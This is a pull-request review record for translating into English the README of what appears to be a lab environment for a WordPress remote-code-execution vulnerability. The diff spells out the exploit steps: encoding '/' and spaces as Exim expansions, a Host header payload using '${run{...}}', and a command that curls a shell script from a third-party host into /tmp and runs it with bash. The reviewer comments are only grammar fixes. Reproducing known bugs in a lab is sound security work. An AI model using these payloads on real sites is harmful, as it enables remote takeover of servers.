### PR TITLE
update translation

### PR DESCRIPTION
**Pull request by JrDw0**

### CODE REVIEW

File: wordpress/pwnscriptum/README.md [hunk 1]
```diff
@@ -1,23 +1,23 @@
...
-编译及运行测试环境
+## Environment setup
 
 ```
 docker-compose build
 docker-compose up -d
 ```
 
-由于Mysql初始化需要一段时间，所以请等待。成功运行后，打开站点，初始化管理员用户名和密码后即可使用（数据库等已经配置好，且不会自动更新）。
+Because Mysql initialization need a little time, so please wait. After initialization success, visit the site, set the administrator username and password to use it (the database is configured and not automatically updated).
```
Comment (sfdye) [inline wordpress/pwnscriptum/README.md]: needs

Comment (sfdye) [reply wordpress/pwnscriptum/README.md]: After initialization `success` -> After initialization `succeeds` or `is complete`

File: wordpress/pwnscriptum/README.md [hunk 2]
```diff
@@ -31,29 +31,33 @@ Content-Type: application/x-www-form-urlencoded
...
+4. Need know an existing user username
 
-为了解决这些坑，漏洞作者想出了，利用`${substr{0}{1}{$spool_directory}}`代替`/`，用`${substr{10}{1}{$tod_log}}`代替空格的方法。
+In order to solve these problems, the vulnerability author came up with $`substr{0}{1}{$spool_directory}}` instead of `/`, using `${substr{10}{1}{$tod_log} }` method of replacing spaces.
 
-但是还是有很多字符不能用，所以我们需要将待执行的命令放到第三方网站中，然后通过`curl -o /tmp/rce example.com/shell.sh`的方法先将他下载到/tmp目录中，再去执行。
+However, there are still a lot of characters can't be used. So we need to put the command on the third-party website, and then download it to `/tmp` directory by `curl -o /tmp/rce example.com/shell.sh`.
 
-所以，总体来说利用过程如下：
+Therefore, the expliot process as follows:
```
Comment (sfdye) [inline wordpress/pwnscriptum/README.md]: process as follows -> process `is` as follows

File: wordpress/pwnscriptum/README.md [hunk 3]
```diff
@@ -31,29 +31,33 @@ Content-Type: application/x-www-form-urlencoded
...
+ - the entire url's uppercase letters will be converted to lowercase, so the file path should not contain uppercase letters.
+ - Access to this page can't be redirected because the parameter for follow redirect is `-L` (uppercase).
 
-我将上述过程写成[exp脚本](exploit.py)，将脚本中target修改成你的目标，user修改成一个已经存在的用户，`shell_url`修改成你放置payload的网址。（或直接将target作为第一个参数、`shell_url`作为第二个参数）
+2. Splice the command`/usr/bin/curl -o/tmp/rce example.com/shell.sh`and`/bin/bash /tmp/rce`.
 
-执行即可获得shell：
+3. Convert the spaces and `/` in the command to `${substr{10}{1}{$tod_log}}` and `${substr{0}{1}{$spool_directory}}`.
+
+4. Spliced the HTTP Host header:`target(any -froot@localhost -be ${run{command}} null)`.
```
Comment (sfdye) [inline wordpress/pwnscriptum/README.md]: `Spliced` -> `Produce`/`Make`?

**Comment by sfdye** [comment]
👍 没什么大问题

**Comment by JrDw0** [comment]
thks!

**Pull request merged**